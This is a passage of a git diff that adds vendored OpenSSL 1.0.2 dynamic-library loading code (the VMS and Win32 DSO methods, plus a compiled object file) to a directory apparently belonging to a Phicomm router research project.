+        DSOerr(DSO_F_VMS_BIND_SYM, DSO_R_NULL_HANDLE);
+        return;
+    }
+
+    if (dso->flags & DSO_FLAG_UPCASE_SYMBOL)
+        flags = 0;
+
+    status = do_find_symbol(ptr, &symname_dsc, sym, flags);
+
+    if (!$VMS_STATUS_SUCCESS(status)) {
+        unsigned short length;
+        char errstring[257];
+        struct dsc$descriptor_s errstring_dsc;
+
+        errstring_dsc.dsc$w_length = sizeof(errstring);
+        errstring_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+        errstring_dsc.dsc$b_class = DSC$K_CLASS_S;
+        errstring_dsc.dsc$a_pointer = errstring;
+
+        *sym = NULL;
+
+        status = sys$getmsg(status, &length, &errstring_dsc, 1, 0);
+
+        if (!$VMS_STATUS_SUCCESS(status))
+            lib$signal(status); /* This is really bad.  Abort! */
+        else {
+            errstring[length] = '\0';
+
+            DSOerr(DSO_F_VMS_BIND_SYM, DSO_R_SYM_FAILURE);
+            if (ptr->imagename_dsc.dsc$w_length)
+                ERR_add_error_data(9,
+                                   "Symbol ", symname,
+                                   " in ", ptr->filename,
+                                   " (", ptr->imagename, ")",
+                                   ": ", errstring);
+            else
+                ERR_add_error_data(6,
+                                   "Symbol ", symname,
+                                   " in ", ptr->filename, ": ", errstring);
+        }
+        return;
+    }
+    return;
+}
+
+static void *vms_bind_var(DSO *dso, const char *symname)
+{
+    void *sym = 0;
+    vms_bind_sym(dso, symname, &sym);
+    return sym;
+}
+
+static DSO_FUNC_TYPE vms_bind_func(DSO *dso, const char *symname)
+{
+    DSO_FUNC_TYPE sym = 0;
+    vms_bind_sym(dso, symname, (void **)&sym);
+    return sym;
+}
+
+static char *vms_merger(DSO *dso, const char *filespec1,
+                        const char *filespec2)
+{
+    int status;
+    int filespec1len, filespec2len;
+    struct FAB fab;
+    struct NAMX_STRUCT nam;
+    char esa[NAMX_MAXRSS + 1];
+    char *merged;
+
+/* Arrange 32-bit pointer to (copied) string storage, if needed. */
+# if __INITIAL_POINTER_SIZE == 64
+#  define FILESPEC1 filespec1_32p;
+#  define FILESPEC2 filespec2_32p;
+#  pragma pointer_size save
+#  pragma pointer_size 32
+    char *filespec1_32p;
+    char *filespec2_32p;
+#  pragma pointer_size restore
+    char filespec1_32[NAMX_MAXRSS + 1];
+    char filespec2_32[NAMX_MAXRSS + 1];
+# else                          /* __INITIAL_POINTER_SIZE == 64 */
+#  define FILESPEC1 ((char *) filespec1)
+#  define FILESPEC2 ((char *) filespec2)
+# endif                         /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+    if (!filespec1)
+        filespec1 = "";
+    if (!filespec2)
+        filespec2 = "";
+    filespec1len = strlen(filespec1);
+    filespec2len = strlen(filespec2);
+
+# if __INITIAL_POINTER_SIZE == 64
+    /* Copy the file names to storage with a 32-bit pointer. */
+    filespec1_32p = filespec1_32;
+    filespec2_32p = filespec2_32;
+    strcpy(filespec1_32p, filespec1);
+    strcpy(filespec2_32p, filespec2);
+# endif                         /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+    fab = cc$rms_fab;
+    nam = CC_RMS_NAMX;
+
+    FAB_OR_NAML(fab, nam).FAB_OR_NAML_FNA = FILESPEC1;
+    FAB_OR_NAML(fab, nam).FAB_OR_NAML_FNS = filespec1len;
+    FAB_OR_NAML(fab, nam).FAB_OR_NAML_DNA = FILESPEC2;
+    FAB_OR_NAML(fab, nam).FAB_OR_NAML_DNS = filespec2len;
+    NAMX_DNA_FNA_SET(fab)
+
+        nam.NAMX_ESA = esa;
+    nam.NAMX_ESS = NAMX_MAXRSS;
+    nam.NAMX_NOP = NAM$M_SYNCHK | NAM$M_PWD;
+    SET_NAMX_NO_SHORT_UPCASE(nam);
+
+    fab.FAB_NAMX = &nam;
+
+    status = sys$parse(&fab, 0, 0);
+
+    if (!$VMS_STATUS_SUCCESS(status)) {
+        unsigned short length;
+        char errstring[257];
+        struct dsc$descriptor_s errstring_dsc;
+
+        errstring_dsc.dsc$w_length = sizeof(errstring);
+        errstring_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+        errstring_dsc.dsc$b_class = DSC$K_CLASS_S;
+        errstring_dsc.dsc$a_pointer = errstring;
+
+        status = sys$getmsg(status, &length, &errstring_dsc, 1, 0);
+
+        if (!$VMS_STATUS_SUCCESS(status))
+            lib$signal(status); /* This is really bad.  Abort! */
+        else {
+            errstring[length] = '\0';
+
+            DSOerr(DSO_F_VMS_MERGER, DSO_R_FAILURE);
+            ERR_add_error_data(7,
+                               "filespec \"", filespec1, "\", ",
+                               "defaults \"", filespec2, "\": ", errstring);
+        }
+        return (NULL);
+    }
+
+    merged = OPENSSL_malloc(nam.NAMX_ESL + 1);
+    if (!merged)
+        goto malloc_err;
+    strncpy(merged, nam.NAMX_ESA, nam.NAMX_ESL);
+    merged[nam.NAMX_ESL] = '\0';
+    return (merged);
+ malloc_err:
+    DSOerr(DSO_F_VMS_MERGER, ERR_R_MALLOC_FAILURE);
+}
+
+static char *vms_name_converter(DSO *dso, const char *filename)
+{
+    int len = strlen(filename);
+    char *not_translated = OPENSSL_malloc(len + 1);
+    strcpy(not_translated, filename);
+    return (not_translated);
+}
+
+#endif                          /* OPENSSL_SYS_VMS */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_vms.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_vms.o
new file mode 100644
index 0000000000000000000000000000000000000000..9fa4e3fcc533a1a53636ef77354164f7f2143f2b
GIT binary patch
literal 1368
zcmbtS$w~u35Up`s;sP#s5EY3h6}3rR5IsmhV?4Nk3wV(*Nk#>oB+PUqdeC3+=%;uT
zy!Z)zhT_eOR%NQkPCIzef}U6Pre1Ybci(2WHd-tTlv%I}-;rVgj#|F`OvBAU4|KzO
z@7PEB@d<KkYb(jg!$PerYsqCXFH*DVrCK9Q-^`^%YGEp*xlAi!AFeiBxt&A6@{h#X
zxX1=W0PA`Wta_g{($kT+!^Vgo<$oQFzX8qC3U8lrId<%%)PpvxCbXmOG!k9AF-0>+
zkqzxX$p#<axs9Eg){Vq~)@P(F1(p1z7l<OP@9*Zfvj>~I>qKyYBqL4IG>r(ZJn0lb
z1kw-jOnK6+OAsYTIv@%`0HRp&JhzNoxguSG*EAbQr+CisX}Kn<ex>UA@(P6SUO2)%
z%b)m;=kn(NfDzQv-I*tt;hNDoaBRNWapZ|p?}^hOryK)K{RI9`;QFh62DMZ(g-bWJ
z|Flk`ul85CsBwC#uLqj1bc)KNLub@<_ZZhXA<3wKX4UN&1FC82?>Whw%hVrX9=+xa
z=PP*OMu(W_M5I2IUh#2zljNB`Xs;na7b4X#^~9NXN0JBLf0zQzn2wl!^y2idoOl{#
IhK{NK0=rXA7ytkO

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_win32.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_win32.c
new file mode 100644
index 0000000..c65234e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_win32.c
@@ -0,0 +1,788 @@
+/* dso_win32.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/dso.h>
+
+#if !defined(DSO_WIN32)
+DSO_METHOD *DSO_METHOD_win32(void)
+{
+    return NULL;
+}
+#else
+
+# ifdef _WIN32_WCE
+#  if _WIN32_WCE < 300
+static FARPROC GetProcAddressA(HMODULE hModule, LPCSTR lpProcName)
+{
+    WCHAR lpProcNameW[64];
+    int i;
+
+    for (i = 0; lpProcName[i] && i < 64; i++)
+        lpProcNameW[i] = (WCHAR)lpProcName[i];
+    if (i == 64)
+        return NULL;
+    lpProcNameW[i] = 0;
+
+    return GetProcAddressW(hModule, lpProcNameW);
+}
+#  endif
+#  undef GetProcAddress
+#  define GetProcAddress GetProcAddressA
+
+static HINSTANCE LoadLibraryA(LPCSTR lpLibFileName)
+{
+    WCHAR *fnamw;
+    size_t len_0 = strlen(lpLibFileName) + 1, i;
+
+#  ifdef _MSC_VER
+    fnamw = (WCHAR *)_alloca(len_0 * sizeof(WCHAR));
+#  else
+    fnamw = (WCHAR *)alloca(len_0 * sizeof(WCHAR));
+#  endif
+    if (fnamw == NULL) {
+        SetLastError(ERROR_NOT_ENOUGH_MEMORY);
+        return NULL;
+    }
+#  if defined(_WIN32_WCE) && _WIN32_WCE>=101
+    if (!MultiByteToWideChar(CP_ACP, 0, lpLibFileName, len_0, fnamw, len_0))
+#  endif
+        for (i = 0; i < len_0; i++)
+            fnamw[i] = (WCHAR)lpLibFileName[i];
+
+    return LoadLibraryW(fnamw);
+}
+# endif
+
+/* Part of the hack in "win32_load" ... */
+# define DSO_MAX_TRANSLATED_SIZE 256
+
+static int win32_load(DSO *dso);
+static int win32_unload(DSO *dso);
+static void *win32_bind_var(DSO *dso, const char *symname);
+static DSO_FUNC_TYPE win32_bind_func(DSO *dso, const char *symname);
+# if 0
+static int win32_unbind_var(DSO *dso, char *symname, void *symptr);
+static int win32_unbind_func(DSO *dso, char *symname, DSO_FUNC_TYPE symptr);
+static int win32_init(DSO *dso);
+static int win32_finish(DSO *dso);
+static long win32_ctrl(DSO *dso, int cmd, long larg, void *parg);
+# endif
+static char *win32_name_converter(DSO *dso, const char *filename);
+static char *win32_merger(DSO *dso, const char *filespec1,
+                          const char *filespec2);
+static int win32_pathbyaddr(void *addr, char *path, int sz);
+static void *win32_globallookup(const char *name);
+
+static const char *openssl_strnchr(const char *string, int c, size_t len);
+
+static DSO_METHOD dso_meth_win32 = {
+    "OpenSSL 'win32' shared library method",
+    win32_load,
+    win32_unload,
+    win32_bind_var,
+    win32_bind_func,
+/* For now, "unbind" doesn't exist */
+# if 0
+    NULL,                       /* unbind_var */
+    NULL,                       /* unbind_func */
+# endif
+    NULL,                       /* ctrl */
+    win32_name_converter,
+    win32_merger,
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    win32_pathbyaddr,
+    win32_globallookup
+};
+
+DSO_METHOD *DSO_METHOD_win32(void)
+{
+    return (&dso_meth_win32);
+}
+
+/*
+ * For this DSO_METHOD, our meth_data STACK will contain; (i) a pointer to
+ * the handle (HINSTANCE) returned from LoadLibrary(), and copied.
+ */
+
+static int win32_load(DSO *dso)
+{
+    HINSTANCE h = NULL, *p = NULL;
+    /* See applicable comments from dso_dl.c */
+    char *filename = DSO_convert_filename(dso, NULL);
+
+    if (filename == NULL) {
+        DSOerr(DSO_F_WIN32_LOAD, DSO_R_NO_FILENAME);
+        goto err;
+    }
+    h = LoadLibraryA(filename);
+    if (h == NULL) {
+        DSOerr(DSO_F_WIN32_LOAD, DSO_R_LOAD_FAILED);
+        ERR_add_error_data(3, "filename(", filename, ")");
+        goto err;
+    }
+    p = (HINSTANCE *) OPENSSL_malloc(sizeof(HINSTANCE));
+    if (p == NULL) {
+        DSOerr(DSO_F_WIN32_LOAD, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    *p = h;
+    if (!sk_void_push(dso->meth_data, p)) {
+        DSOerr(DSO_F_WIN32_LOAD, DSO_R_STACK_ERROR);
+        goto err;
+    }
+    /* Success */
+    dso->loaded_filename = filename;
+    return (1);
+ err:
+    /* Cleanup ! */
+    if (filename != NULL)
+        OPENSSL_free(filename);
+    if (p != NULL)
+        OPENSSL_free(p);
+    if (h != NULL)
+        FreeLibrary(h);
+    return (0);
+}
+
+static int win32_unload(DSO *dso)
+{
+    HINSTANCE *p;
+    if (dso == NULL) {
+        DSOerr(DSO_F_WIN32_UNLOAD, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (sk_void_num(dso->meth_data) < 1)
+        return (1);
+    p = sk_void_pop(dso->meth_data);
+    if (p == NULL) {
+        DSOerr(DSO_F_WIN32_UNLOAD, DSO_R_NULL_HANDLE);
+        return (0);
+    }
+    if (!FreeLibrary(*p)) {
+        DSOerr(DSO_F_WIN32_UNLOAD, DSO_R_UNLOAD_FAILED);
+        /*
+         * We should push the value back onto the stack in case of a retry.
+         */
+        sk_void_push(dso->meth_data, p);
+        return (0);
+    }
+    /* Cleanup */
+    OPENSSL_free(p);
+    return (1);
+}
+
+/*
+ * Using GetProcAddress for variables? TODO: Check this out in the Win32 API
+ * docs, there's probably a variant for variables.
+ */
+static void *win32_bind_var(DSO *dso, const char *symname)
+{
+    HINSTANCE *ptr;
+    void *sym;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_WIN32_BIND_VAR, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (sk_void_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_WIN32_BIND_VAR, DSO_R_STACK_ERROR);
+        return (NULL);
+    }
+    ptr = sk_void_value(dso->meth_data, sk_void_num(dso->meth_data) - 1);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_WIN32_BIND_VAR, DSO_R_NULL_HANDLE);
+        return (NULL);
+    }
+    sym = GetProcAddress(*ptr, symname);
+    if (sym == NULL) {
+        DSOerr(DSO_F_WIN32_BIND_VAR, DSO_R_SYM_FAILURE);
+        ERR_add_error_data(3, "symname(", symname, ")");
+        return (NULL);
+    }
+    return (sym);
+}
+
+static DSO_FUNC_TYPE win32_bind_func(DSO *dso, const char *symname)
+{
+    HINSTANCE *ptr;
+    void *sym;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_WIN32_BIND_FUNC, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (sk_void_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_WIN32_BIND_FUNC, DSO_R_STACK_ERROR);
+        return (NULL);
+    }
+    ptr = sk_void_value(dso->meth_data, sk_void_num(dso->meth_data) - 1);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_WIN32_BIND_FUNC, DSO_R_NULL_HANDLE);
+        return (NULL);
+    }
+    sym = GetProcAddress(*ptr, symname);
+    if (sym == NULL) {
+        DSOerr(DSO_F_WIN32_BIND_FUNC, DSO_R_SYM_FAILURE);
+        ERR_add_error_data(3, "symname(", symname, ")");
+        return (NULL);
+    }
+    return ((DSO_FUNC_TYPE)sym);
+}
+
+struct file_st {
+    const char *node;
+    int nodelen;
+    const char *device;
+    int devicelen;
+    const char *predir;
+    int predirlen;
+    const char *dir;
+    int dirlen;
+    const char *file;
+    int filelen;
+};
+
+static struct file_st *win32_splitter(DSO *dso, const char *filename,
+                                      int assume_last_is_dir)
+{
+    struct file_st *result = NULL;
+    enum { IN_NODE, IN_DEVICE, IN_FILE } position;
+    const char *start = filename;
+    char last;
+
+    if (!filename) {
+        DSOerr(DSO_F_WIN32_SPLITTER, DSO_R_NO_FILENAME);
+        /*
+         * goto err;
+         */
+        return (NULL);
+    }
+
+    result = OPENSSL_malloc(sizeof(struct file_st));
+    if (result == NULL) {
+        DSOerr(DSO_F_WIN32_SPLITTER, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    memset(result, 0, sizeof(struct file_st));
+    position = IN_DEVICE;
+
+    if ((filename[0] == '\\' && filename[1] == '\\')
+        || (filename[0] == '/' && filename[1] == '/')) {
+        position = IN_NODE;
+        filename += 2;
+        start = filename;
+        result->node = start;
+    }
+
+    do {
+        last = filename[0];
+        switch (last) {
+        case ':':
+            if (position != IN_DEVICE) {
+                DSOerr(DSO_F_WIN32_SPLITTER, DSO_R_INCORRECT_FILE_SYNTAX);
+                /*
+                 * goto err;
+                 */
+                OPENSSL_free(result);
+                return (NULL);
+            }
+            result->device = start;
+            result->devicelen = (int)(filename - start);
+            position = IN_FILE;
+            start = ++filename;
+            result->dir = start;
+            break;
+        case '\\':
+        case '/':
+            if (position == IN_NODE) {
+                result->nodelen = (int)(filename - start);
+                position = IN_FILE;
+                start = ++filename;
+                result->dir = start;
+            } else if (position == IN_DEVICE) {
+                position = IN_FILE;
+                filename++;
+                result->dir = start;
+                result->dirlen = (int)(filename - start);
+                start = filename;
+            } else {
+                filename++;
+                result->dirlen += (int)(filename - start);
+                start = filename;
+            }
+            break;
+        case '\0':
+            if (position == IN_NODE) {
+                result->nodelen = (int)(filename - start);
+            } else {
+                if (filename - start > 0) {
+                    if (assume_last_is_dir) {
+                        if (position == IN_DEVICE) {
+                            result->dir = start;
+                            result->dirlen = 0;
+                        }
+                        result->dirlen += (int)(filename - start);
+                    } else {
+                        result->file = start;
+                        result->filelen = (int)(filename - start);
+                    }
+                }
+            }
+            break;
+        default:
+            filename++;
+            break;
+        }
+    }
+    while (last);
+
+    if (!result->nodelen)
+        result->node = NULL;
+    if (!result->devicelen)
+        result->device = NULL;
+    if (!result->dirlen)
+        result->dir = NULL;
+    if (!result->filelen)
+        result->file = NULL;
+
+    return (result);
+}
+
+static char *win32_joiner(DSO *dso, const struct file_st *file_split)
+{
+    int len = 0, offset = 0;
+    char *result = NULL;
+    const char *start;
+
+    if (!file_split) {
+        DSOerr(DSO_F_WIN32_JOINER, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (file_split->node) {
+        len += 2 + file_split->nodelen; /* 2 for starting \\ */
+        if (file_split->predir || file_split->dir || file_split->file)
+            len++;              /* 1 for ending \ */
+    } else if (file_split->device) {
+        len += file_split->devicelen + 1; /* 1 for ending : */
+    }
+    len += file_split->predirlen;
+    if (file_split->predir && (file_split->dir || file_split->file)) {
+        len++;                  /* 1 for ending \ */
+    }
+    len += file_split->dirlen;
+    if (file_split->dir && file_split->file) {
+        len++;                  /* 1 for ending \ */
+    }
+    len += file_split->filelen;
+
+    if (!len) {
+        DSOerr(DSO_F_WIN32_JOINER, DSO_R_EMPTY_FILE_STRUCTURE);
+        return (NULL);
+    }
+
+    result = OPENSSL_malloc(len + 1);
+    if (!result) {
+        DSOerr(DSO_F_WIN32_JOINER, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    if (file_split->node) {
+        strcpy(&result[offset], "\\\\");
+        offset += 2;
+        strncpy(&result[offset], file_split->node, file_split->nodelen);
+        offset += file_split->nodelen;
+        if (file_split->predir || file_split->dir || file_split->file) {
+            result[offset] = '\\';
+            offset++;
+        }
+    } else if (file_split->device) {
+        strncpy(&result[offset], file_split->device, file_split->devicelen);
+        offset += file_split->devicelen;
+        result[offset] = ':';
+        offset++;
+    }
+    start = file_split->predir;
+    while (file_split->predirlen > (start - file_split->predir)) {
+        const char *end = openssl_strnchr(start, '/',
+                                          file_split->predirlen - (start -
+                                                                   file_split->predir));
+        if (!end)
+            end = start
+                + file_split->predirlen - (start - file_split->predir);
+        strncpy(&result[offset], start, end - start);
+        offset += (int)(end - start);
+        result[offset] = '\\';
+        offset++;
+        start = end + 1;
+    }
+# if 0                          /* Not needed, since the directory converter
+                                 * above already appeneded a backslash */
+    if (file_split->predir && (file_split->dir || file_split->file)) {
+        result[offset] = '\\';
+        offset++;
+    }
+# endif
+    start = file_split->dir;
+    while (file_split->dirlen > (start - file_split->dir)) {
+        const char *end = openssl_strnchr(start, '/',
+                                          file_split->dirlen - (start -
+                                                                file_split->dir));
+        if (!end)
+            end = start + file_split->dirlen - (start - file_split->dir);
+        strncpy(&result[offset], start, end - start);
+        offset += (int)(end - start);
+        result[offset] = '\\';
+        offset++;
+        start = end + 1;
+    }
+# if 0                          /* Not needed, since the directory converter
+                                 * above already appeneded a backslash */
+    if (file_split->dir && file_split->file) {
+        result[offset] = '\\';
+        offset++;
+    }
+# endif
+    strncpy(&result[offset], file_split->file, file_split->filelen);
+    offset += file_split->filelen;
+    result[offset] = '\0';
+    return (result);
+}
+
+static char *win32_merger(DSO *dso, const char *filespec1,
+                          const char *filespec2)
+{
+    char *merged = NULL;
+    struct file_st *filespec1_split = NULL;
+    struct file_st *filespec2_split = NULL;
+
+    if (!filespec1 && !filespec2) {
+        DSOerr(DSO_F_WIN32_MERGER, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (!filespec2) {
+        merged = OPENSSL_malloc(strlen(filespec1) + 1);
+        if (!merged) {
+            DSOerr(DSO_F_WIN32_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        strcpy(merged, filespec1);
+    } else if (!filespec1) {
+        merged = OPENSSL_malloc(strlen(filespec2) + 1);
+        if (!merged) {
+            DSOerr(DSO_F_WIN32_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        strcpy(merged, filespec2);
+    } else {
+        filespec1_split = win32_splitter(dso, filespec1, 0);
+        if (!filespec1_split) {
+            DSOerr(DSO_F_WIN32_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        filespec2_split = win32_splitter(dso, filespec2, 1);
+        if (!filespec2_split) {
+            DSOerr(DSO_F_WIN32_MERGER, ERR_R_MALLOC_FAILURE);
+            OPENSSL_free(filespec1_split);
+            return (NULL);
+        }
+
+        /* Fill in into filespec1_split */
+        if (!filespec1_split->node && !filespec1_split->device) {
+            filespec1_split->node = filespec2_split->node;
+            filespec1_split->nodelen = filespec2_split->nodelen;
+            filespec1_split->device = filespec2_split->device;
+            filespec1_split->devicelen = filespec2_split->devicelen;
+        }
+        if (!filespec1_split->dir) {
+            filespec1_split->dir = filespec2_split->dir;
+            filespec1_split->dirlen = filespec2_split->dirlen;
+        } else if (filespec1_split->dir[0] != '\\'
+                   && filespec1_split->dir[0] != '/') {
+            filespec1_split->predir = filespec2_split->dir;
+            filespec1_split->predirlen = filespec2_split->dirlen;
+        }
+        if (!filespec1_split->file) {
+            filespec1_split->file = filespec2_split->file;
+            filespec1_split->filelen = filespec2_split->filelen;
+        }
+
+        merged = win32_joiner(dso, filespec1_split);
+    }
+    OPENSSL_free(filespec1_split);
+    OPENSSL_free(filespec2_split);
+    return (merged);
+}
+
+static char *win32_name_converter(DSO *dso, const char *filename)
+{
+    char *translated;
+    int len, transform;
+
+    len = strlen(filename);
+    transform = ((strstr(filename, "/") == NULL) &&
+                 (strstr(filename, "\\") == NULL) &&
+                 (strstr(filename, ":") == NULL));
+    if (transform)
+        /* We will convert this to "%s.dll" */
+        translated = OPENSSL_malloc(len + 5);
+    else
+        /* We will simply duplicate filename */
+        translated = OPENSSL_malloc(len + 1);
+    if (translated == NULL) {
+        DSOerr(DSO_F_WIN32_NAME_CONVERTER, DSO_R_NAME_TRANSLATION_FAILED);
+        return (NULL);
+    }
+    if (transform)
+        sprintf(translated, "%s.dll", filename);
+    else
+        sprintf(translated, "%s", filename);
+    return (translated);
+}
+
+static const char *openssl_strnchr(const char *string, int c, size_t len)
+{
+    size_t i;
+    const char *p;
+    for (i = 0, p = string; i < len && *p; i++, p++) {
+        if (*p == c)
+            return p;
+    }
+    return NULL;
+}
+
+# include <tlhelp32.h>
+# ifdef _WIN32_WCE
+#  define DLLNAME "TOOLHELP.DLL"
+# else
+#  ifdef MODULEENTRY32
+#   undef MODULEENTRY32         /* unmask the ASCII version! */
+#  endif
+#  define DLLNAME "KERNEL32.DLL"
+# endif
+
+typedef HANDLE(WINAPI *CREATETOOLHELP32SNAPSHOT) (DWORD, DWORD);
+typedef BOOL(WINAPI *CLOSETOOLHELP32SNAPSHOT) (HANDLE);
+typedef BOOL(WINAPI *MODULE32) (HANDLE, MODULEENTRY32 *);
+
+static int win32_pathbyaddr(void *addr, char *path, int sz)
+{
+    HMODULE dll;
+    HANDLE hModuleSnap = INVALID_HANDLE_VALUE;
+    MODULEENTRY32 me32;
+    CREATETOOLHELP32SNAPSHOT create_snap;
+    CLOSETOOLHELP32SNAPSHOT close_snap;
+    MODULE32 module_first, module_next;
+
+    if (addr == NULL) {
+        union {
+            int (*f) (void *, char *, int);
+            void *p;
+        } t = {
+            win32_pathbyaddr
+        };
+        addr = t.p;
+    }
+
+    dll = LoadLibrary(TEXT(DLLNAME));
+    if (dll == NULL) {
+        DSOerr(DSO_F_WIN32_PATHBYADDR, DSO_R_UNSUPPORTED);
+        return -1;
+    }
+
+    create_snap = (CREATETOOLHELP32SNAPSHOT)
+        GetProcAddress(dll, "CreateToolhelp32Snapshot");
+    if (create_snap == NULL) {
+        FreeLibrary(dll);
+        DSOerr(DSO_F_WIN32_PATHBYADDR, DSO_R_UNSUPPORTED);
+        return -1;
+    }
+    /* We take the rest for granted... */
+# ifdef _WIN32_WCE
+    close_snap = (CLOSETOOLHELP32SNAPSHOT)
+        GetProcAddress(dll, "CloseToolhelp32Snapshot");
+# else
+    close_snap = (CLOSETOOLHELP32SNAPSHOT) CloseHandle;
+# endif
+    module_first = (MODULE32) GetProcAddress(dll, "Module32First");
+    module_next = (MODULE32) GetProcAddress(dll, "Module32Next");
+
+    hModuleSnap = (*create_snap) (TH32CS_SNAPMODULE, 0);
+    if (hModuleSnap == INVALID_HANDLE_VALUE) {
+        FreeLibrary(dll);
+        DSOerr(DSO_F_WIN32_PATHBYADDR, DSO_R_UNSUPPORTED);
+        return -1;
+    }
+
+    me32.dwSize = sizeof(me32);
+
+    if (!(*module_first) (hModuleSnap, &me32)) {
+        (*close_snap) (hModuleSnap);
+        FreeLibrary(dll);
+        DSOerr(DSO_F_WIN32_PATHBYADDR, DSO_R_FAILURE);
+        return -1;
+    }
+
+    do {
+        if ((BYTE *) addr >= me32.modBaseAddr &&
+            (BYTE *) addr < me32.modBaseAddr + me32.modBaseSize) {
+            (*close_snap) (hModuleSnap);
+            FreeLibrary(dll);
+# ifdef _WIN32_WCE
+#  if _WIN32_WCE >= 101
+            return WideCharToMultiByte(CP_ACP, 0, me32.szExePath, -1,
+                                       path, sz, NULL, NULL);
+#  else
+            {
+                int i, len = (int)wcslen(me32.szExePath);
+                if (sz <= 0)
+                    return len + 1;
+                if (len >= sz)
+                    len = sz - 1;
+                for (i = 0; i < len; i++)
+                    path[i] = (char)me32.szExePath[i];
+                path[len++] = 0;
+                return len;
+            }
+#  endif
+# else
+            {
+                int len = (int)strlen(me32.szExePath);
+                if (sz <= 0)
+                    return len + 1;
+                if (len >= sz)
+                    len = sz - 1;
+                memcpy(path, me32.szExePath, len);
+                path[len++] = 0;
+                return len;
+            }
+# endif
+        }
+    } while ((*module_next) (hModuleSnap, &me32));
+
+    (*close_snap) (hModuleSnap);
+    FreeLibrary(dll);
+    return 0;
+}
+
+static void *win32_globallookup(const char *name)
+{
+    HMODULE dll;
+    HANDLE hModuleSnap = INVALID_HANDLE_VALUE;
+    MODULEENTRY32 me32;
+    CREATETOOLHELP32SNAPSHOT create_snap;
+    CLOSETOOLHELP32SNAPSHOT close_snap;
+    MODULE32 module_first, module_next;
+    FARPROC ret = NULL;
+
+    dll = LoadLibrary(TEXT(DLLNAME));
+    if (dll == NULL) {
+        DSOerr(DSO_F_WIN32_GLOBALLOOKUP, DSO_R_UNSUPPORTED);
+        return NULL;
+    }
+
+    create_snap = (CREATETOOLHELP32SNAPSHOT)
+        GetProcAddress(dll, "CreateToolhelp32Snapshot");
+    if (create_snap == NULL) {
+        FreeLibrary(dll);
